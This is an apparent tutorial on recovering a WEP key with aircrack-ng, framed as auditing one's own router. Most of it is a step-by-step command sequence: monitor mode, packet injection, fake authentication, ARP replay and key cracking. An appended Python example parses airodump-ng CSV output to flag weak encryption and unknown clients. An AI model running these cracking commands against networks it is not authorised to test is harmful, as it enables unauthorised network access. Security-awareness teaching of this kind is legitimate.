Hack WEP Encryption with Aircrack
That’s right, I am here trying to persuade everyone to turn off their wireless connection. In reality I’m not telling you to turn off your wifi access, but I will try to make you more aware of certain security vulnerabilities that wireless can introduce.
In this article I am going to walk you through how a war driver could hack into your wireless router that is protected with a WEP 64 bit key. I will be using a PC running Ubuntu Linux, with a Belkin 9050 USB wireless adapter. The program that I will be using is called aircrack-ng. The first thing that you must do in order to check the security of your wireless router is find a wireless adapter that can be put into monitor mode. To check to see if your wireless adapter is compatible. After you have a compatible adapter and the driver is all set up, you have to enable monitor mode. Just to note, your wireless adapter may take on a different name than mine does. To find out what your wifi card is called, type in the command ifconfig. Throughout this article, I will be using a terminal program logged in under su.
The first thing that you are going to want to do when auditing the wireless security of your router is find out a little bit of information. In order to audit your wireless router, you will first have to turn on monitor mode / promiscuous mode.
airmon-ng start wlan0
Since you will be hacking into your own wireless router, you will see how this is done from a hacker’s point of view. The next command that you will issue will allow you to view a list of local wireless networks, what channel each network is on and the MAC address of each router.
airodump-ng mon0
In order to test the security of your wireless network, you need to record the MAC address of your router, what channel your router is on, the SSID, and the MAC address of your wireless adapter. To find the MAC address of your wireless adapter, open a terminal window and issue the command ifconfig. You should see your MAC address listed as HWaddr. After you have recorded all the important information you need, you now need to shut down your wireless adapter.
airmon-ng stop mon0
airmon-ng stop wlan0
Start monitor mode again and set the channel to 1.
airmon-ng start wlan0 1
We will now test and see if we can inject packets into the router.
aireplay-ng -9 -e 2WIRE276 -a 00:18:3F:7A:B8:11 mon0
Start airodump-ng and capture IVs.
airodump-ng -c 1 --bssid 00:18:3F:7A:B8:11 -w output mon0
Authenticate with the router.
aireplay-ng -1 0 -e 2WIRE276 -a 00:18:3F:7A:B8:11 -h 00:11:50:FD:68:FC mon0
OR
aireplay-ng -1 6000 -o 1 -q 10 -e 2WIRE276 -a 00:18:3F:7A:B8:11 -h 00:11:50:FD:68:FC mon0
Collect ARP requests used to create data.
aireplay-ng -3 -b 00:18:3F:7A:B8:11 -h 00:11:50:FD:68:FC mon0
Use aircrack-ng to obtain the WEP key.
aircrack-ng -z -b 00:18:3F:7A:B8:11 output*.cap
airmon-ng stop mon0
airmon-ng stop wlan0
Log in using key: 313865309
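The airodump-ng run with -w output also writes a CSV summary next to the .cap file. The following is an added example, not part of the original article: it reads that CSV and reports, for your own router's BSSID, whether it still advertises WEP or no encryption and which associated clients you do not recognise. The function names, the known_macs parameter and the sample rows are assumptions made for illustration.

```python
import csv
import io

# Constructed sample in airodump-ng's CSV layout (AP table, then station table).
# BSSID, ESSID and adapter MAC are the article's; all other values are made up.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:18:3F:7A:B8:11, 2010-01-01 10:00:00, 2010-01-01 10:05:00,  1,  54, WEP , WEP,    , -40, 120, 3500,   0.  0.  0.  0,   8, 2WIRE276,
AA:BB:CC:DD:EE:01, 2010-01-01 10:00:02, 2010-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -55, 100, 0,   0.  0.  0.  0,   9, Smith, Jr,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:11:50:FD:68:FC, 2010-01-01 10:01:00, 2010-01-01 10:05:00, -30, 900, 00:18:3F:7A:B8:11,
AA:BB:CC:DD:EE:02, 2010-01-01 10:01:00, 2010-01-01 10:05:00, -60, 40, (not associated) ,
"""


def parse_airodump_csv(text):
    """Return (access_points, stations) as lists of dicts (hypothetical helper)."""
    aps, stations, section = [], [], None
    for row in csv.reader(io.StringIO(text)):
        cells = [c.strip() for c in row]
        if not any(cells):
            continue
        if cells[0] == "BSSID":
            section = "ap"
        elif cells[0] == "Station MAC":
            section = "sta"
        elif section == "ap" and len(cells) >= 15:
            # An ESSID containing commas splits across cells; it is everything
            # between the ID-length column and the final Key column.
            aps.append({"bssid": cells[0].upper(), "channel": cells[3],
                        "privacy": cells[5], "essid": ", ".join(cells[13:-1])})
        elif section == "sta" and len(cells) >= 6:
            stations.append({"mac": cells[0].upper(), "bssid": cells[5].upper()})
    return aps, stations


def audit_router(text, bssid, known_macs=()):
    """Report encryption and unrecognised clients for one BSSID (your own)."""
    aps, stations = parse_airodump_csv(text)
    ap = next((a for a in aps if a["bssid"] == bssid.upper()), None)
    if ap is None:
        return None  # router not seen in this capture
    known = {m.upper() for m in known_macs}
    unknown = [s["mac"] for s in stations
               if s["bssid"] == ap["bssid"] and s["mac"] not in known]
    return {"essid": ap["essid"], "channel": ap["channel"],
            "privacy": ap["privacy"], "unknown_clients": unknown,
            "wep_or_open": ap["privacy"] in ("WEP", "OPN")}
```

In the sample, the adapter MAC used for the authentication step shows up as an unrecognised client of the router, which is the trace this kind of audit leaves for anyone watching the same channel.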






